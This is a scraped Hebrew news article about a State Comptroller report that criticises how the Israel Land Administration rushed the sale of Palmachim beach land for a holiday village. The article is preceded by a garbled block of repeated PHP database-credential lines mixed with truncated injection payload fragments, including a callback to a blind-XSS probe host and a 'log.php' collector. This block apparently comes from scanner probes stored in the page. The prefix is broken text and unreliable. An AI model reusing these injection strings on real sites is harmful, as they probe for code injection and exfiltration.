$db_host = "1"; $db_user = "pHqghUme"; $db_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> $db_host = "1"; $db_user = "pHqghUme"; $db_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> $db_host = "1"; $db_user = "pHqghUme"; $db_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> $db_host = "1"; $db_user = "pHqghUme"; $db_pass = "g00dPa$$w0rD"; $db_name = "1ySf9n9nO"; ?> $db_host = "1" $db_host = "1"; $db_user = "pHqghUme"; $db_pass = "g00dPa$$w0rD"; $db_name = "19342244"; ?> ?>acker-9434/log.php?"; ?>{acx}}%>"; ?> $db_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> ?> $db_name = "1"; ?>b_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> ?>>'hitvtgywpoinqc09d0.bxss.me')")"; $db_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> ?> מבקר המדינה גילה ממצאים חמורים בהליכים להקמת כפר נופש בחוף פלמחים
x

דיווח על תקלה

תאור תקלה:
שם:
דואר אלקטרוני:
חיפוש באתר
מאמרים אחרונים

נמצאו ליקויים חמורים בהליכים להקמת כפר נופש בחוף פלמחים

תאריך: 13/09/2010 16:39   מחבר: מערכת האתר

בדצמבר 2003 פרסם מינהל מקרקעי ישראל מכרז לשיווק שטח של כ-70 דונם מחוף פלמחים להקמת כפר נופש. באפריל 2004 החליטה ועדת המכרזים של המועצה המקומית גן רווה  כי הזוכות במכרז הן שתי חברות קבלניות שהגישו הצעת מחיר משותפת בסכום של כ -8 מיליון ש"ח.תוצאות המכרז עוררו גלי מחאה ציבורית.

הציבור סרב להשלים עם העובדה שהקמת כפר נופש תפגע אנושות בסביבה החופית ועוד במחיר מגוחך של מכירת קרקע שעליה יוקם הכפר. הסוגיה שהייתה על הפרק הובאה לדיון בוועדת הפנים ואיכות הסביבה של הכנסת . בתום הדיון הוחלט כי מבקר המדינה יבדוק את הליכי אישור התוכנית להקמת הכפר ומכירת הקרקע בעקבותיה. ממצאי דוח המבקר פורסמו בחודש נובמבר 2009 וכל המתואר כאן, נסמך על ממצאי דוח הביקורת.

מינהל שעובד לבד

הביקורת העלתה, כי מינהל מקרקעי ישראל האיץ במתכוון את הליכי שיווק הקרקע כדי לבצע את העסקה לפני שייכנס לתוקף חוק שמטרתו להגן על אינטרס הציבור, ושהיה באותו מועד בשלבי חקיקה סופיים (חוק שמירת הסביבה החופית, התשס"ד-2004, שהתקבל בכנסת בתחילת אוגוסט 2004).

עוד מתברר מבדיקת המבקר כי מינהל מקרקע ישראל היה כל כך להוט למכור את הקרקע בחוף פלמחים ולסגור עסקה, ללא הפרעות מצד משרדים ממשלתיים אחרים. אם זה לא היה כך, איך אפשר להסביר את העובדה כי המינהל התעלם מהמלצות השמאי הממשלתי שאמור לקבוע את שווי הקרקע המיועדת למכירה לפי אמות מידה ציבוריות ולפיהן על המינהל לנהוג. איך יתכן שמשרד התיירות שלו נגיעה ישירה ומקצועית להקמת כפר נופש מתוכנן, לא יודע דבר על התוכניות שהמינהל רוקם ומריץ. המכרז הוכן על ידי המינהל מבלי לשתף את הגורמים במשרד התיירות. לא רק שלא שיתפו אלא לא הוסיפו במכרז תנאי מחייב להמציא המלצה ממשרד התיירות להקמת כפר נופש.

לדעת המבקר, התעלמות המינהל ממשרד התיירות הינה מחדל חמור ותמוה. אילו היה המשרד מודע לתוכניות סביר להניח כי היה ביכולתו להגדיל את מספר המשתתפים במכרז מהארץ ומחו"ל ובכך להגדיל הסיכויים לקבל הצעות מחיר הרבה יותר טובות.

מוסדות תכנוון כושלים

המבקר לא חוסך שבט ביקורתו ממוסדות התכנון. לפי קביעתו, מוסדות אלו כשלו בכך שלא יזמו פעולה אקטיבית להגנה על החוף ולא בחנו מחדש תכניות ישנות נוכח השינויים שחלו במגמות החקיקה ובתכנית המתאר הארצית.

לטענת המבקר על מוסדות התכנון לפעול תוך הקמת מערך ביקורות וכל תוכנית צריכה לקבל אישור של כמה דרגים. "לדאבון הלב כל אלה כשלו במקרה הנוכחי", קובע המבקר ומוסיף באותו הקשר כי שיתוף הפעולה והתיאום בין מוסדות התכנון, המינהל ומשרד התיירות לוקים בחסר, ועקב כך אין מדיניות כוללת ומתואמת בנוגע לסוגיית הקמת כפר הנופש בחוף.

לסיכום עיקרי הממצאים קובע המבקר כי בעסקה לשיווק הקרקע בחוף פלמחים הייתה התעלמות חמורה מאינטרס הציבור, הן מן ההיבט הסביבתי, הן מן ההיבט הכלכלי והן מן ההיבט של פיתוח הקרקע לרווחת הציבור.

החופים של הציבור

המבקר מבקש להזכיר לכולם כי חופי הים בישראל הם משאב טבע ייחודי ומוגבל המיועד לשימוש כלל הציבור ולתועלתו. מחובת רשויות המדינה למנוע השתלטות של בעלי הון על קרקעות  ציבוריות  ולהבטיח כי חופי הים במדינת ישראל יישארו בידי הציבור וימשיכו לשמש אתרי בילוי ופנאי לכל האוכלוסייה, בדור הזה ובדורות הבאים.

בעקבות הביקורת וגלי מחאה של פעילים למען שמירת החופים ואיכות הסביבה, טרם נחתם חוזה חכירה עם היזם הזוכה. במועד סיום הביקורת פג תוקפו של הסכם הפיתוח, ועסקת מכירת הקרקע טרם הושלמה. חרף זאת, דווח לאחרונה באמצעי התקשורת כי באחד מירידי הנדל"ן, מתבצע קמפיין למכירת יחידות נופש בפלמחים. עד כמה אפשר להיות ציני ?

לאור הממצאים החמורים של דוח הביקורת, דורש המבקר משר הפנים, ממוסדות התכנון ומינהל מקרקעי ישראל, לבחון מחדש, את העסקה לשיווק הקרקע ולשקול מחדש אם הארכת תוקף החוזה עם היזם משרתת באמת את האינטרס הציבורי של שמירה על החוף ונגישותו לכלל הציבור.

לאור הממצאים החמורים שעלו מהדוח, הורה המבקר להעביר הדוח ליועץ המשפטי לממשלה כדי לבחון אם עולה חשד לעבירות פליליות. בטרם חתם על הדוח, ביקש המבקר להודות לכל הפעילים בתחום איכות הסביבה וכך כתב: " לא אוכל לסיים מבוא זה בלי להעלות על נס ולשבח את פעולות הארגונים להגנת הסביבה, שהעלו לסדר היום הציבורי נושא זה של השמירה על חוף פלמחים, הנוגע לכלל הציבור, ופעלו לקיומם של דיון ובדיקה בנושא. פעולתם הייתה ראויה ובמקומה". גם אנחנו חושבים כמו המבקר ונמשיך לעקוב.